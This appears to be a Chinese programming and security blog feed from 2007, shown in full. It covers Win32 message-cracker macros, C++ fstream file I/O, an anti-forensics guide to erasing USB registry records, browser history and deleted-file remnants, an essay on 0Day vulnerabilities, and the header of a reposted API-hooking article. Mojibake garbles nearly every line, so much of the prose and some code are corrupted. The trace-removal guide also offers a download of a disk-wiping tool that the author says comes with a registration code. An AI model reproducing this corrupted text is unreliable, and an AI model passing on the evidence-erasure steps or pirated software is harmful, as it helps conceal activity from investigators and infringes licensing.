由此可见�Q�LRESULT的实质就�?4的long�c�d��的变�?/p>

那么(LRESULT)-1L的实质�ƈ不是减法�Q�而是((LRESULT)(-1L))�Q�即强制�c�d��转换

三重�Q�把消息分流器的宏定义代换回去，��成了下面的样子
LRESULT CALLBACK WndProc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
  case WM_CREATE:
  return Cls_OnCreate(hwnd, (LPCREATESTRUCT)(lParam)) ? 0L : (LRESULT)-1L;
  // 如果处理了消息，则Cls_OnCreate应返回TRUE�Q�导致WndProc�q�回0�Q�否则Cls_OnCreate�q�回FALSE�Q�导致WndProc�q�回-1�Q?/p>

  case WM_PAINT:
  return Cls_OnPaint(hwnd), 0L;
  // 逗号表达式；Cls_OnPaint是void�c�d��Q�这里返�?�Q?

case WM_DESTROY:
return Cls_OnDestroy(hwnd), 0L; // 同Cls_OnPaint
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
在逗号表达式，C++会计��每个表辑ּ��Q�但完整的逗号表达式的�l�果是最双��表达式的倹{�?br>所以，会return 0�?br>然后�Q�就可以手动的编写各个处理函��C��Q�Cls_OnCreate�Q�Cls_OnPaint�Q�WM_DESTROY�?/p>

四重�Q?br>LRESULT CALLBACK WndProc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
  HANDLE_MSG(hwnd, WM_CREATE, Cls_OnCreate);
  HANDLE_MSG(hwnd, WM_PAINT, Cls_OnPaint);
  HANDLE_MSG(hwnd, WM_DESTROY, Cls_OnDestroy);
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}

HANDLE_MSG也是一个宏�Q�它在windowsx.h中定义，如下�Q?br>#define HANDLE_MSG(hwnd, message, fn) case (message): return HANDLE_##message((hwnd), (wParam), (lParam), (fn))

�q�个宏要做的��是�Ҏ��不同的message�Q?#用来�q�接前后的字�W�串�Q�，把自�?#8220;变成”相应的HANDLE_XXXXMESSAGE形式的宏�Q�再通过相应的宏来执行消息处理代码�?br>说白了，��是把message的消息做为替换，##��是一个替换的标志�?br>如果没有##�Q�就成了HANDLE_message了，�q�样�Q�宏是不会被代换的�?br>如果��单独一个，则会代换�Q�如hwnd和fn�?/p>

比如实际代码中写入：
HANDLE_MSG(hwnd, WM_CREATE, Cls_OnCreate)
则经�q��{换就变成�Q?br>case (WM_CREATE): return HANDLE_WM_CREATE((hwnd), (wParam), (lParam), (Cls_OnCreate))
�q�与二重一模一栗��?/p>

以上四重�Q�是消息分离器的基本使用�Q�但�Q�这不完��_��消息分离器主要应用在对话框消息处理中�?br>�q�里�Q�窗口子�c�d��是我们经�怋�用的手段�Q�这也可以通过消息分流器实玎ͼ�

�W�五�?br>LRESULT CALLBACK Dlg_Proc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
HANDLE_MSG(hwnd, WM_INITDIALO , Cls_OnInitDialog); // 不能直接使用HANDLE_MSG�?br> HANDLE_MSG(hwnd, WM_COMMAND, Cls_OnCommand); // 不能直接使用HANDLE_MSG�?br> }
return false;
}
�׃��是窗口子�c�d��Q�所以，最后，�q�回的是false�Q�以表明�Q�如果没有约定响应的消息�Q?br>则返回父亲窗口false�Q�如果有�Q�则�q�回ture�Q�这是与前四重不同的地方�?br>一般情况下�Q�对话框�q�程函数应该在处理了消息的情况下�q�回TRUE�Q�如果没有处理，则返回FALSE�?br>如果对话框过�E�返回了FALSE�Q�那么对话框��理器�ؓ�q�条消息准备默认的对话操作�?/p>

但是�Q�这其中有错误，因�ؓ有的消息,需要单独处理。单独处理的消息列表见SetDlgMsgResult宏�?/p>

�W�六�?br>�q�点��问题，�q�就需要用到SetDlgMsgResult(hwnd, msg, result)宏�?

LRESULT CALLBACK Dlg_Proc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
case WM_INITDIALO:
return (SetDlgMsgResult(hwnd, Msg, HANDLE_WM_INITDIALO((hwnd), (wParam), (lParam), (fn)));

case WM_COMMAND:
return (SetDlgMsgResult(hwnd, Msg, HANDLE_WM_COMMAND((hwnd), (wParam), (lParam), (fn)));
}
return false;
}
�q�里�Q�就用直接用��C��W�二重的消息分流器，而抛弃了其他�?/p>

�q�个宏定义如下：
#define SetDlgMsgResult(hwnd, msg, result)
(
(
(msg) == WM_CTLCOLORMSGBOX ||
(msg) == WM_CTLCOLOREDIT ||
(msg) == WM_CTLCOLORLISTBOX ||
(msg) == WM_CTLCOLORBTN ||
(msg) == WM_CTLCOLORDLG ||
(msg) == WM_CTLCOLORSCROLLBAR ||
(msg) == WM_CTLCOLORSTATIC ||
(msg) == WM_COMPAREITEM ||
(msg) == WM_VKEYTOITEM ||
(msg) == WM_CHARTOITEM ||
(msg) == WM_QUERYDRAGICON ||
(msg) == WM_INITDIALOG
) ?
(BOOL)(result) :
(SetWindowLongPtr((hwnd), DWLP_MSGRESULT, (LPARAM)(LRESULT)(result)), TRUE)
)

��Z��表述清楚�Q�所以用了此格式�Q�这是一个三��表辑ּ��Q�首先对消息�c�d��q�行考察�?/p>

如果对话框过�E�处理的消息恰��y��回特定��g��的一个，则如实返回result�Q?br>不要被前面的BOOL蒙蔽�Q�BOOL在头文�g中的定义实际上是一个int型，
一旦需要返回非TRUE或FALSE的其他��|��照样可以�Q?/p>

�q�样�Q�我们的Cls_OnInitDialog��p��够正��的�q�回它的BOOL��g��Q?br>而Cls_OnCommand在处理之后，也可以由后面的逗号表达式正��的�q�回一个TRUE表示消息已处理�?/p>

�W�七�?br>我们�q�可以把case也包含进来，��成了如下的样子�?/p>

LRESULT CALLBACK Dlg_Proc (HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
switch(msg)
{
chHANDLE_DLGMSG(hwnd, WM_INITDIALOG, Cls_OnInitDialog);
chHANDLE_DLGMSG(hwnd, WM_COMMAND, Cls_OnCommand);
}
return false;
}

chHANDLE_DLGMSG是牛人定义的一个宏�Q�它把case也包含进来了�?br>#define chHANDLE_DLGMSG(hwnd, message, fn) case (message): return (SetDlgMsgResult(hwnd, uMsg, HANDLE_##message((hwnd), (wParam), (lParam), (fn))))

�q�样�Q�程序中的语�?br> switch (uMsg)
{
  chHANDLE_DLGMSG(hwnd, WM_INITDIALOG, Dlg_OnInitDialog);
  chHANDLE_DLGMSG(hwnd, WM_SIZE,       Dlg_OnSize);
  chHANDLE_DLGMSG(hwnd, WM_COMMAND,    Dlg_OnCommand);
}

��p��译成：
switch (uMsg)
{
case (WM_INITDIALOG):
return (SetDlgMsgResult(hwnd, uMsg, HANDLE_WM_INITDIALOG((hwnd), (wParam), (lParam), (Dlg_OnInitDialog))));

case (WM_SIZE)
return (SetDlgMsgResult(hwnd, uMsg, HANDLE_WM_SIZE((hwnd), (wParam), (lParam), (Dlg_OnSize))));

case (WM_COMMAND)
return (SetDlgMsgResult(hwnd, uMsg, HANDLE_WM_COMMAND((hwnd), (wParam), (lParam), (Dlg_OnCommand))));
}

�q�样,消息分流�?��׃��l�完�?

saga.constantine 2007-09-04 13:40 发表评论

saga.constantine — Tue, 19 Jun 2007 15:46:00 GMT

在C++中，有一个stream�q�个�c�，所有的I/O都以�q�个“��?#8221;�c�Mؓ基础的，包括我们要认识的文�gI/O�Q�stream�q�个�c�L��两个重要的运��符�Q?/p>

1、插入器(<<)
　　向流输出数据。比如说�pȝ��有一个默认的标准输出��?cout)�Q�一般情况下��是指的昄��器，所以，cout<<"Write Stdout"<<' ';��p��C�把字符�?Write Stdout"和换行字�W?' ')输出到标准输出流�?/p>

2、析取器(>>)
　　从流中输入数据。比如说�pȝ��有一个默认的标准输入��?cin)�Q�一般情况下��是指的键盘�Q�所以，cin>>x;��p��C�Z��标准输入��中��d��一个指定类�?卛_��量x的类�?的数据�?/p>

　　在C++中，�Ҏ��件的操作是通过stream的子�c?a name=0>fstream(file stream)来实现的�Q�所以，要用�q�种方式操作文�g�Q�就必须加入头文�?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream.h。下面就把此�cȝ��文�g操作�q�程一一道来�?/p>

一、打开文�g
　　�?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream�c�M��Q�有一个成员函数open()�Q�就是用来打开文�g的，其原型是�Q?/p>

void open(const char* filename,int mode,int access);

参数�Q?/p>

filename�Q�　　要打开的文件名
mode�Q�　　　　要打开文�g的方�?
access�Q�　　　打开文�g的属�?br>打开文�g的方式在�c�ios(是所有流式I/O�cȝ��基类)中定义，常用的值如下：

ios::app�Q�　　　以追加的方式打开文�g
ios::ate�Q�　　　文�g打开后定位到文�g��，ios:app��包含有此属�?
ios::binary�Q?　�?a name=2>二进�?/strong>方式打开文�g�Q�缺省的方式是文本方式。两�U�方式的区别见前�?
ios::in�Q�　　　文�g以输入方式打开
ios::out�Q�　　　文�g以输出方式打开
ios::nocreate�Q?不徏立文�Ӟ��所以文件不存在时打开��p�|　
ios::noreplace�Q�不覆盖文�g�Q�所以打开文�g时如果文件存在失�?
ios::trunc�Q�　　如果文�g存在�Q�把文�g长度设�ؓ0
　　可以�?#8220;�?#8221;把以上属性连接�v来，如ios::out|ios::binary

　　打开文�g的属性取值是�Q?/p>
0�Q�普通文�Ӟ��打开讉K��
1�Q�只��L��?
2�Q�隐含文�?
4�Q�系�l�文�?
　　可以�?#8220;�?#8221;或�?#8220;+”把以上属性连接�v�?�Q�如3�?|2��是以只��d��隐含属性打开文�g�?/p>
　　例如�Q�以二进�?/strong>输入方式打开文�gc:config.sys

　　fstream file1;
　　file1.open("c:\config.sys",ios::binary|ios::in,0);

　　如果open函数只有文�g名一个参敎ͼ�则是以读/写普通文件打开�Q�即�Q?/p>
　　file1.open("c:\config.sys");<=>file1.open("c:\config.sys",ios::in|ios::out,0);

　　另外�Q?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream�q�有和open()一��L��构造函敎ͼ�对于上例�Q�在定义的时侯就可以打开文�g了：

　　fstream file1("c:\config.sys");

　　特别提出的是�Q?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream有两个子�c�：ifstream(input file stream)和ofstream(outpu file stream)�Q�ifstream默认以输入方式打开文�g�Q�而ofstream默认以输出方式打开文�g�?/p>

　　ifstream file2("c:\pdos.def");//以输入方式打开文�g
　　ofstream file3("c:\x.123");//以输出方式打开文�g

　　所以，在实际应用中�Q�根据需要的不同�Q�选择不同的类来定义：如果想以输入方式打开�Q�就用ifstream来定义；如果想以输出方式打开�Q�就用ofstream来定义；如果想以输入/输出方式来打开�Q�就�?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream来定义�?/p>

二、关闭文�?br>　　打开的文件��用完成后一定要关闭�Q?strong style="COLOR: black; BACKGROUND-COLOR: #ffff66">fstream提供了成员函数close()来完成此操作�Q�如�Q�file1.close();��把file1相连的文件关闭�?/p>

三、读写文�?br>　　��d��文�g分�ؓ文本文�g�?strong style="COLOR: black; BACKGROUND-COLOR: #99ff99">二进�?/strong>文�g�?strong style="COLOR: black; BACKGROUND-COLOR: #a0ffff">��d��Q�对于文本文件的��d��比较��单，用插入器和析取器��可以了�Q�而对�?strong style="COLOR: black; BACKGROUND-COLOR: #99ff99">二进�?/strong>�?strong style="COLOR: black; BACKGROUND-COLOR: #a0ffff">��d��p��复杂些，下要��p��l�的介绍�q�两�U�方�?/p>

　　1、文本文件的��d��
　　文本文�g的读写很��单：用插入器(<<)向文件输出；用析取器(>>)从文件输入。假设file1是以输入方式打开�Q�file2以输出打开。示例如下：

　　file2<<"I Love You";//向文件写入字�W�串"I Love You"
　　int i;
　　file1>>i;//从文件输入一个整数倹{�?

　　�q�种方式�q�有一�U�简单的格式化能力，比如可以指定输出�?6�q�制�{�等�Q�具体的格式有以下一�?/p>

操纵�W?功能输入/输出
dec 格式化�ؓ十进制数值数�?输入和输�?
endl 输出一个换行符�q�刷新此��?输出
ends 输出一个空字符输出
hex 格式化�ؓ十六�q�制数值数�?输入和输�?
oct 格式化�ؓ八进制数值数�?输入和输�?
setpxecision(int p) 讄��点数的�_�ֺ�位数输出

　　比如要把123当作十六�q�制输出�Q�file1<

　　2�?strong style="COLOR: black; BACKGROUND-COLOR: #99ff99">二进�?/strong>文�g的读�?br>①put()
　　put()函数向流写入一个字�W�，其原型是ofstream &put(char ch)�Q��用也比较��单，如file1.put('c');��是向流写一个字�W?c'�?

②get()
　　get()函数比较灉|��Q�有3�U�常用的重蝲形式�Q?/p>

　　一�U�就是和put()对应的�Ş式：ifstream &get(char &ch);功能是从��中��d��一个字�W�，�l�果保存在引用ch中，如果到文件尾�Q�返回空字符。如file2.get(x);表示从文件中��d��一个字�W�，�q�把��d��的字�W�保存在x中�?/p>

　　另一�U�重载�Ş式的原型是： int get();�q�种形式是从��中�q�回一个字�W�，如果到达文�g��，�q�回EOF�Q�如x=file2.get();和上例功能是一��L��?/p>

　　�q�有一�U��Ş式的原型是：ifstream &get(char *buf,int num,char delim=' ')�Q�这�U��Ş式把字符��d��?buf 指向的数�l�，直到��d��?num 个字�W�或遇到了由 delim 指定的字�W�，如果没��?delim �q�个参数�Q�将使用�~�省值换行符' '。例如：

　　file2.get(str1,127,'A');//从文件中��d��字符到字�W�串str1�Q�当遇到字符'A'�?strong style="COLOR: black; BACKGROUND-COLOR: #a0ffff">��d��?27个字�W�时�l�止�?/p>

③读写数据块
　　要读�?strong style="COLOR: black; BACKGROUND-COLOR: #99ff99">二进�?/strong>数据块，使用成员函数read()和write()成员函数�Q�它们原型如下：

　　　　read(unsigned char *buf,int num);
　　　　write(const unsigned char *buf,int num);

　　read()从文件中��d�� num 个字�W�到 buf 指向的缓存中�Q�如果在�q�未��d�� num 个字�W�时��到了文件尾�Q�可以用成员函数 int gcount();来取得实�?strong style="COLOR: black; BACKGROUND-COLOR: #a0ffff">��d��的字�W�数�Q��?write() 从buf 指向的缓存写 num 个字�W�到文�g中，值得注意的是�~�存的类型是 unsigned char *�Q�有时可能需要类型�{换�?/p>

例：

　　　　unsigned char str1[]="I Love You";
　　　　int n[5];
　　　　ifstream in("xxx.xxx");
　　　　ofstream out("yyy.yyy");
　　　　out.write(str1,strlen(str1));//把字�W�串str1全部写到yyy.yyy�?br>　　　　in.read((unsigned char*)n,sizeof(n));//从xxx.xxx�?strong style="COLOR: black; BACKGROUND-COLOR: #a0ffff">��d��指定个整敎ͼ�注意�c�d��转换
　　　　in.close();out.close();

四、检��EOF
　　成员函数eof()用来��是否到达文件尾�Q�如果到达文件尾�q�回�?��|��否则�q�回0。原型是int eof();

例：　　if(in.eof())ShowMessage("已经到达文�g��！");

五、文件定�?br>　　和C的文件操作方式不同的是，C++ I/O�pȝ��理两个与一个文件相联系的指针。一个是��L��针，它说明输入操作在文�g中的位置�Q�另一个是写指针，它下�ơ写操作的位�|�。每�ơ执行输入或输出�Ӟ��相应的指针自动变化。所以，C++的文件定位分��位置和写位置的定位，对应的成员函数是 seekg()�?seekp()�Q�seekg()是设�|�读位置�Q�seekp是设�|�写位置。它们最通用的�Ş式如下：

　　　　istream &seekg(streamoff offset,seek_dir origin);
　　　　ostream &seekp(streamoff offset,seek_dir origin);

　　streamoff定义�?iostream.h 中，定义有偏�U�量 offset 所能取得的最大��|��seek_dir 表示�U�d��的基准位�|�，是一个有以下值的枚�D�Q?

ios::beg�Q�　　文�g开�?
ios::cur�Q�　　文�g当前位置
ios::end�Q�　　文�g�l�尾
　　�q�两个函��C��般用�?strong style="COLOR: black; BACKGROUND-COLOR: #99ff99">二进�?/strong>文�g�Q�因为文本文件会因�ؓ�pȝ��对字�W�的解释而可能与预想的��g��同�?/p>

例：

　　　　 file1.seekg(1234,ios::cur);//把文件的��L��针从当前位置向后�U?234个字�?br>　　　　 file2.seekp(1234,ios::beg);//把文件的写指针从文�g开头向后移1234个字�?

saga.constantine 2007-06-19 23:46 发表评论

[��译]什么是“流”（What a Stream Is�Q�？

saga.constantine — Tue, 19 Jun 2007 13:26:00 GMT

取自MSND�Q?br>
像C�Q�C++语言都没有内�|�输入输出的功能。所有的C++�~�译器，都捆�l�着一个像iostream的类�q�样的面向对象的�pȝ��的包(package)�?#8220;��?#8221;是iostream的核心概��c��你可以�?#8220;��?#8221;理解成�ؓ不停的从源头向目标搬�q�着字节的一�U�特�D�的文�g对象。一�U?#8220;��?#8221;的特性由他的�c�d��他自定义的输入输出符号决定�?br> �l�由讑֤�驱动�Q�磁盘操作系�l�控制着键盘�Q�屏�q�，打印机和以通信端口形式存在的扩展文件。I/O��作用于�q�些扩展文�g。内�|�的�c?classes)提供于磁盘I/O相同语法的读取与写入功能�Q��?#8220;��?#8221;�q�会使得�q�些变得更简单宜行�?br> C++库里面最重要的输出流(output stream)�c�L��ostream�Q�ofstream�Q�ostrstream。他们��承于basic_ostream�?br>同样最重要的输入流(input stream)�c�L��istream�Q�ifstream�Q�istrstream�?

saga.constantine 2007-06-19 21:26 发表评论

saga.constantine — Mon, 21 May 2007 15:12:00 GMT

         有时候计��机上的一些痕�q�很�ȝ��Q��L��惛_��掉。比如：USB闪存�Q�移动硬盘，上网�Q�还有计��机上已�l�删除的文�g�?br>         我来一个一个说说简单的处理�Ҏ��。不敢保�?00%�Q�但是应该差不多�?br>         一.USB�U�d��存储介质痕迹的清除�?br>         只要你的机器上插上过USB�U�d��存储讑֤��Q�就会留下痕�q�V��包括设备的型号�Q�首�ơ��用时��_��最�q��用时间的记录。下载工�?/span>www.shnenglu.com/Files/saga/USBlog.rar。解压后�q�行USBlog.exe��׃��在桌面上生成机器使用USB�U�d��存储讑֤�的��用记录。是txt格式的文本�?br>         �q�个的原理是因�ؓ每次插上新的USB��g讑֤�的时候就会在注册表里面自动的记录下来�?br>         删除的方法如下：
         1.按开�?-〉运行，在输入框里输入命令：regedit
         2.删除注册表中
                 �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\USBSTOR
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\USBSTOR
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\USBSTOR
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
            �q�些路径下USBSTOR子项的全部下�U�子��V��删除时要注意先要给其添加权限，�Ҏ��是：在找到如�?br>            USBSTOR子项上按鼠标右键�Q�接着在弹��单上选权限，�l�everyone用户授与完全控制的权限。然�?br>            ��应该可以删除了�?br>         3.要彻底清除USB使用记录�Q�完成上�q�操作后�Q�要接着删除
                 �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\USB
　       　 �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\USB
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\USB
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
            �q�些路径下除ROOT_HUB、ROOT_HUB20外的所有子��V�?br>         4.然后删除DeviceClasses下的a5d...�?3f...�{�含usb字眼的部分子��V��如
                 �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-                                901f-00c04fb951ed}
　             �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\DeviceClasses\{a5dcbf10-6530-11d2-                                901f-00c04fb951ed}
　　         �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control\DeviceClasses\{a5dcbf10-6530-11d2-                                901f-00c04fb951ed}
                        ………………
　　  　 �Q?�Q�HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-                                94f2-00a0c91efb8b}
                        ………………�{��?br>最后在用USBlog��查一下，没有记录��OK。但是强烈徏议在修改注册表之前进行备份�?br>
          �?上网痕迹的清除�?br>          ①清�I�Internet临时文�g�?
　　      依次单击IE菜单栏中�?#8220;工具”→“Internet选项”�Q�打开“Internet选项”对话框，�?#8220;常规”标签中点�?#8220;删除文�g”按钮�Q�在弹出�?#8220;删除文�g”�H�口中勾�?#8220;删除所有脱机内�?#8221;�Q�最后点�?#8220;��定”。当然也可以删除"C:\Documents and Settings\<用户�?gt;\Local Settings\Temporary Internet Files"目录下的全部内容�?br>
         ②清除Cookie
　　      �?#8220;Internet选项”对话框的“常规”标签中单�?#8220;删除Cookies”按钮�Q�待弹出�H�口后单�?#8220;��定”按钮�Q�可删除Cookie�?nbsp;

         ③消除访问网��늚�历史记录
　　      删除“C:\Documents and Settings\用户名\Local Settings\History”文�g夹中的所有内容即可。也可以在Internet选项对话框的“常规”标签下点“清除历史�U�录”按钮�?
要让IE不记录访问历�Ԍ��请在Internet选项对话框的“常规”选项下，��网��保存在历史�U�录中的天数从默认的20�Ҏ��0卛_��?br>
         ④清除IE��C��的表单内�?
　　      要删除它们，可在“Internet选项”对话框的“内容”标签下点“自动完成”按钮�Q�在弹出�?#8220;自动完成讄��”对话框中��?#8220;表单”�?#8220;表单上的用户名和密码”�?#8220;提示我保存密�?#8221;前的钩去掉，再单�?#8220;清除表单”�?#8220;清除密码”按钮�Q�当询问时点“��定”�?nbsp;

         ⑤删除地址栏列表中的网址
　　      �?#8220;Internet选项”对话框的“内容”标签下单�?#8220;自动完成”按钮�Q�打开“自动完成”对话框，��L��“Web地址”前的钩，然后按确定�?
　　若安装了“中文�|�址”软�g�Q�采用上法不能将地址栏列表中�?#8220;�|�络实名”清除�Q�此时要�?#8220;Internet选项”对话框的“高��”选项卡下�Q�选中“�|�络实名”中的“清除地址栏下拉列表中昄��的网�l�实�?#8221;��，单击“��定”�?br>
         好了�Q��ؓ了干净��d��再清�I�回收站�?br>
         �?关于一些应用程序的痕迹删除可以查找相关的资料，我就不多说了。下面说说大家最��x��的��是自己删除了的文�g�q�会被别人用EasyRecovery�{�类的恢复工��h��复出蛛丝马迹来。因为普通的文�g删除只是删除了文件的在系�l�中的�\径信息。真正的文�g�q��h在硬盘上面。除非被新的文�g覆盖。不然就可以被恢复。有人难免要问：��N��有低格硬盘才行吗�Q�其实不用，有专门的工具来除掉这些痕�q�V��我推荐用CleanDiskSecurity。这个工��h��较简单小巧实用。我传上来一个带注册码的。英文版的，不懂��多查查字典。有帮助文档�?br>         用这�U�工具除痕之后，恢复软�g��根本没有希望恢复出你想要永�q�删除的数据了�?br>         下蝲地址www.shnenglu.com/Files/saga/CleanDiskSecurity-v7.65.rar�?br>         提示一下，对硬盘上�I�白区域的擦�z�处理比较耗时。需要有点耐心�?br>
         好了�Q�以上是自己的一点经验，有什么错误的地方��h��出。有更好的方法或是工兯��回帖说明�Q�让大家可以更好的交��除痕的�Ҏ��?br>
                                                                                   -------saga.constantine

saga.constantine 2007-05-21 23:12 发表评论

saga.constantine — Sun, 20 May 2007 07:20:00 GMT

��g��?Day正引发信息安全新“地震”看不见的才是最可怕的
　　�q�就�?Day的真正威�?br>　　如果你是一家企业的�|�络安全�ȝ��Q�企业外�|�的安全代码、脚本分析、环境配�|�、维护补丁已做到无懈可击�Q�内�|�防火墙、防病毒、入侉|��、��n份认证等��g设施也齐全完备，从技术手�D�|��Ԍ��g��没有什么可担心的；但你考虑�q�你所使用的操作系�l�、网站��^台或其他�W�三方应用程序，是否存在着某个不�ؓ人知的重大漏�z�呢�Q�当你发��C��的网�l�已遭入侵，信息已被�H�取�Q�查遍所有漏�z�数据库和安全补丁资料却不得其解。这�Ӟ��你考虑�q?Day么？
　　什么是0Day
　　0Day的概忉|��早用于��Y件和游戏破解�Q�属于非盈利性和非商业化的组�l�行为，其基本内涉|��“��x��?#8221;。Warez被许多�h误认为是一个最大的软�g破解�l�织�Q�而实际上�Q�Warez如黑客一��P��只是一�U�行为�?Day也是。当时的0Day是指在正版��Y件或游戏发布的当天甚至之前，发布附带着序列��h��者解密器的破解版�Q�让使用者可以不用付费就能长期��用。因此，虽然Warez�?Dday都是反盗版的重要打击对象�Q�却同时受到免费使用者和业内同行的推崇。尽��Warez�?Day的拥护者对以此而谋利的盗版商不齿，但商业利益的驱动�q�是��破解行为的商业化推��C��高峰。而眼下的0Day�Q�正在对信息安全产生��来��严重的威胁�?br>　　信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息�?br>　　2005�q?2�?日，几乎影响Windows所有操作系�l�的WMF漏洞在网上公开�Q�虽然微软在8天后提前发布了安全补丁（微��Y的惯例是在每月的�W�一个周二）�Q�但��在�q?天内出现了二癑֤�个利用此漏洞的攻击脚本。漏�z�信息的公开加速了软�g生��企业的安全补丁更新进�E�，减少了恶意程序的危害�E�度。但如果是不公开�?Day呢？WMF漏洞公开之前�Q�又有多��h已经利用了它�Q�是否有很多0Day一直在�U�密��传�Q�例如，�l�全球网�l�带来巨大危害的“冲击�?#8221;�?#8220;震荡�?#8221;�q�两�U�病毒，如果它们的漏�z�信息没有公开�Q�自然也��没有这两种��病毒的��生。反�q�来惻I��有什么理��p��为眼下不存在�c�M��的有着重大安全隐患的漏�z�呢�Q�（Dtlogin�q�程溢出漏洞�?002�q�被发现�Q?004�q�公布。）
　　看不见的才是最可怕的�Q�这��是0Day的真正威胁�?br>　　不可避免�?Day
　　信息价值的飞速提升，互联�|�在全球的普及，数字�l�济的广泛应用，�q�一切都刺激着信息安全市场的不断扩大，软�g破解、口令解密、间谍��Y件、木马病毒全部都从早期的仅做研究和向他�h炫耀的目的�{化�ؓ�U�商业利益的�q�作�Q��ƈ�q�速地传播开来，从操作系�l�到数据库，从应用��Y件到�W�三方程序和插�g�Q�再到遍布全球的漏洞发布中心�Q�看看它们当中有多少0Day存在�Q�可以毫不夸张的��_��在安全补丁程序发布之前，所有的漏洞信息都是0Day�Q�但是从未发布过安全补丁的��Y件是否就意味着它们当中不存�?Day呢？
　　有�h��_��“每一个稍兯��模的应用软�g都可能存�?Day�?#8221;没错�Q�从理论上讲�Q�漏�z�必定存在，只是��未发现�Q�而��I补措施永�q�滞后而已�?br>　　只要用户方不独自开发操作系�l�或应用�E�序�Q�或者说只要使用�W�三方的软�g�Q?Day的出现就是迟早的事，无论你是使用数据库还是网站管理��^収ͼ�无论你是使用媒体播放器还是绘囑ַ��P��即便是专职安全防护的软�g�E�序本��n�Q�都会出现安全漏�z�，�q�已是不争的事实�Q�但最可怕的不是漏洞存在的先天性，而是0Day的不可预知性�?br>　　从开源的角度上来��_��Linux更容易比��闭源代码的Windows存在更多�?Day。那些自以�ؓ使用着安全操作�pȝ��的�h�Q�迟早会�?Day��d��弄得哑口无言。而微软呢�Q�远有IIS和IE�Q�近有WMF和Excel�Q�由于其操作�pȝ��应用的广泛性，如今已是补丁加补丁，更新再更斎ͼ�最新操作系�l�Vista竟然含有几万行的问题代码。尚未发行，已是满目疮痍�Q�谁又能保证微��Y的源代码没有丝毫泄露呢？
　　0Day走向何方
　　��来��多的破解者和黑客们，已经把目光从率先发布漏洞信息的荣誉感转变到利用这些漏�z�而得到的�l�济利益上，互联�|�到处充斥着��C��万计的充满入侉|��情的脚本��子�Q�更不用说那些以�H�取信息��业的商业间谍和情报�h员了。于是，0Day有了市场�?br>　　国外两年前就有了0Day的网上交易，黑客们通过�|�上报�h出售手中未公开的漏�z�信息，一个操作系�l�或数据库的�q�程溢出源码可以卖到上千��元甚至更高�Q�而国内的黑客同行�Q�前不久也在�|�上建立了一个专门出售入�늨�序号�U�C��国第一0Day的网站，��管�c�M��的提供黑客工��L��|�站很多�Q�但此网站与其它�|�站的区别在�?Day的特性十分明显：��h��较高的攻�ȝ��序的��d��对象�Q�还没有相应的安全补丁，也就是说�q�样的攻�ȝ��序很可能��h��一��d��中的效果。这个网站成立不久便在搜索引擎中消失了，也许已经关闭�Q�也许�{入地下。但不管怎样�Q?Day带来的潜在经��利益不可抹杀�Q�而其��来对信息安全的影响以及危害也绝不能轻视�?br>　　软�g上的0Day几乎不可避免�Q�那��g呢？��g是否存在0Day�Q�答案无疑是肯定的。近�q�来�Q�思科路由器漏�z�频�J�出玎ͼ�今年2月，已被曝光的某知名�|�络产品漏洞至今仍未被修复。对于那些基于IP协议�q�接�|�络的�\由、网兟뀁交换机�Q�哪个电信运营商敢百分之癑֜� 保证自己的网�l�设备万无一失？�Q?005�q?�?1日，全国��过二十个城市的互联�|�出现群发性故障；同年7�?2日，北京20万ADSL用户断网�Q��?br>　　早在两年前，��q��的首席技术官��提��互联�|�不能承受与日俱增的使用者这一��x��Q�当�Ӟ��被很多�h认�ؓ是无�E�之谈。今�q?月，在美国的商业圆桌会议上，包括惠普公司、IBM公司、Sun公司、通用汽�R公司、家得宝公司和可口可乐公司等在内�?60个企业代表呼吁政府要对发生大规模�|�络故障的可能性做好准备工�?#8230;…
　　当今的互联网�Q�病毒、蠕虫、僵��网�l�、间谍��Y件、DDoS犹如�z�水般泛滥，所有的�q�一切都或多或少��C��0Day走过�Q�可以预��，在不�q�的��来�Q�互联网瘫痪�l�不遥远�?br>　　那么政府��理者、电信运营商、安全厂商，�q�有全世界的互联�|�用��P��面对0Day�Q�我们准备好了吗�Q?

saga.constantine 2007-05-20 15:20 发表评论

[转蝲]用户层下拦截�pȝ��api的原理与实现

saga.constantine — Mon, 22 Jan 2007 08:49:00 GMT

**转蝲**
**我自��q��了看�q�片文章�Q�还不错�Q�程序也可以�~�译出来**

文章作者：kiki
信息来源�Q�邪恶八�q�制信息安全团队�Q?/font> www.eviloctal.com �Q?br />本文章首�?/font> 黑色��岸�U�网�l�安全技术论�?/font> �Q�后由kiki友情提交到邪恶八�q�制信息安全团队

